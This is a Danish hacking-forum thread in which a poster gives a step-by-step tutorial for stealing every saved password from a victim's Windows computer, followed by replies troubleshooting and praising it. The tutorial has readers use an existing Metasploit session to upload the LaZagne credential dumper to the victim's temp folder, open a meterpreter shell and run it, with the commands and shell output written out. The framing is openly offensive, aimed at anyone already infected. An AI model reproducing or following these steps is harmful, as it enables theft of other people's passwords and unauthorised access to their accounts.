Shellsec

Jeg håber I nyder nr. 2 Tutorial fra mig :)

Beskrivelse:
I den følgende Tutorial, vil du komme til at arbejde med Shell Console, Metasploit og LaZagne.
Formålet er, at skaffe alle ofrets gemte kodeord.
Du kan se en liste over, hvilke slags passwords, du kan hacke.


Hvad du skal bruge:

• Kali Linux
  
• Metasploit
  
• Basic viden om Kali Linux
  
• Hjerne
  

Hvem er dette attack målrettet i mod?:

• Alle der infectet af en metasploit exploit.
  

Download links:

• https://github.com/AlessandroZ/LaZagne/releases/
  

Tutorial:

1. Download LaZagne ved at skrive wget https://github.com/AlessandroZ/LaZagne/r...indows.zip
   
2. Unzip filen ved, at skrive unzip Windows.zip.
   
3. Skaf en metasploit session til ofret. Du kan søge online efter det, eller bruge min metode, som beskrevet her
   
4. Select dit offer. Skriv sessions for, at se hvilket session ID ofret har. Herefter skriver du sessions -i <id>. I mit tilfælde sessions -i 1
   
5. Nu skriver du cd temp for, at komme ind i temp mappen, på ofrets computer.
   
6. Upload nu LaZagne til ofrets temp mappe. Skriv upload <der hvor du har gemt LaZagne>, i mit tilfælde upload '/root/unicorn/Windows/laZagne.exe' .
   
7. Nu skal du oprette shell adgang, til computeren. Det gør du ved at skrive shell.
   
8. Nu kan du se, at du er inde i temp mappen
   
   Kode:

   meterpreter > shell
Process 12260 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rettigheder forbeholdes.
C:\Users\XXXXXX\AppData\Local\Temp>
   
   
9. Skriv nu herefter følgende laZagne.exe all
   
10. Nu har du fået en liste, med alle de gemte kodeord på ofrets computer.
    
    

Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.

Jeg valgte at lave denne tutorial, fordi folk spurgte mig i min tråd og i PM, hvordan man gjorde :) Jeg håber I kunne bruge min nummer 2 tutorial - det er altid en fornøjelse, at lave en tutorial for jer - jeg elsker jeres feedback.

 - TheHacker, ude

Det ville kræve at Python er installeret på offerets computer.
Det link han har skrevet er rigtigt: https://github.com/AlessandroZ/LaZagne/r...indows.zip
Hvilket ser ud til at være python-versionen wrapped.

Kunne det tænkes du har klonet selve projektet, i stedet for at hente den wrappede .exe?

HOLY SHIT, I ER DE BEDSTE. :D
Det virkede, ja jeg skulle bare lige download zip filen

much love

(09-03-2017, 20:11)MalcolmXI Skrev: [ -> ]Det ville kræve at Python er installeret på offerets computer.
Det link han har skrevet er rigtigt: https://github.com/AlessandroZ/LaZagne/r...indows.zip
Hvilket ser ud til at være python-versionen wrapped.

Kunne det tænkes du har klonet selve projektet, i stedet for at hente den wrappede .exe?

Jeg går ud fra, at en kommentar er blevet fjernet på mystiskvis - eller hvad?

(09-03-2017, 22:09)TheHacker Skrev: [ -> ]Jeg går ud fra, at en kommentar er blevet fjernet på mystiskvis - eller hvad?

Af ham selv ja

(09-03-2017, 22:52)Ash Skrev: [ -> ]Af ham selv ja

Hehe, well okay

Not bad, thanks for share ^^

(10-03-2017, 01:23)Hackedbyte Skrev: [ -> ]Not bad, thanks for share ^^

Glad for, at du kunne bruge det :)

Har leget lidt med LaZagne men syntes ikke det kan noget jeg ikke allerede kan med mimikatz..

Syg tutorial, Rigtig god til nybegyndere. Tak!